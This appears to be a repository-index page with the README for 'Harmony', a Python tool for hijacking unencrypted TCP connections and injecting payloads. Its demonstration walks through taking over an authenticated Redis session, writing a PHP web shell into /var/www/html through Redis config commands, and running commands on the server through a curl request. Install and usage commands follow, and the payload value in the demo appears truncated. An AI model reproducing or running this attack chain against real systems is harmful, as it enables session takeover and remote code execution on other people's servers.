https://github.com/spoofimei/harmony
A general purpose easy to use TCP hijacking tool
https://github.com/spoofimei/harmony
cyber-security low-level-networking network-security tcp-hijack tcp-hijacking-tool
Last synced: over 1 year ago
JSON representation
A general purpose easy to use TCP hijacking tool
- Host: GitHub
- URL: https://github.com/spoofimei/harmony
- Owner: SpoofIMEI
- License: gpl-3.0
- Created: 2024-01-31T18:05:13.000Z (over 2 years ago)
- Default Branch: main
- Last Pushed: 2025-03-08T15:22:17.000Z (over 1 year ago)
- Last Synced: 2025-03-08T16:25:38.336Z (over 1 year ago)
- Topics: cyber-security, low-level-networking, network-security, tcp-hijack, tcp-hijacking-tool
- Language: Python
- Homepage:
- Size: 24.4 KB
- Stars: 8
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
- License: LICENSE
Awesome Lists containing this project
README
# Harmony
Harmony is a pretty simple general-purpose TCP hijacking tool that can be used to inject custom payloads to a TCP connection via piping it to the program or by manually typing it. It does not work against encrypted connections like HTTPS and SFTP, but it's useful against old or misconfigured services, IOT devices and other server software that for some reason just don't have encryption enabled.
```
▌▐ ▌▐ ██ ▒▒▒ ░░ ░░ ░ ░ ░ ░ · ·
▌▐ ▌▐ █ █ ▒ ▒ ░ ░ ░ ░ ░ ░ · ·
▌▐▀▀▀▀▌▐ █▄▄▄▄█ ▒▒▒ ░ ░ ░ ░ ░ ░ ░ ·
▌▐ ▌▐ █ █ ▒ ▒ ░ ░ ░ ░ ░ ░ ·
▌▐ ▌▐ █ █ ▒ ▒ ░ ░ ░ ░ ░ ░ ░ ·
```
## Demonstration
```
Client Hacker
█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀▀█
█ █ █
█$nc 192.168.1.29 6479 █$python3 harmony.py --target 192.168.1.62:192.168.1.29:6379 █
█AUTH peter myPassword1sSecure █Sniffing for a client PSH-ACK... █
█OK █Connection hijacked, type away! █
█ █config set dir /var/www/html █
█ █OK █
█ █config set dbfilename test.php █
█ █OK █
█ █set tcprocks " █
█ █OK █
█ █save █
█ █Killing threads and exiting... █
█ █ █
█ █$curl 192.168.1.29/test.php?cmd=id █
█ █uid=1000(peter) gid=1000(peter) █
█ █ █
█ █$▌ █
█ █ █
█ █ █
█ █ █
█ █ █
█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄▄█
```
## Installation
```
git clone https://github.com/SpoofIMEI/harmony
cd harmony
pip install -r requirements.txt
```
## Usage
`python3 harmony.py --target ::`
## Examples
```
python3 harmony.py --target 192.168.1.52:192.168.1.24:23
cat payload.bin |python3 harmony.py --target 192.168.1.39:192.168.1.53:21
```
## Learn what TCP hijacking is
https://medium.com/@SpoofIMEI/tcp-connection-hijacking-deep-dive-9bbe03fce9a9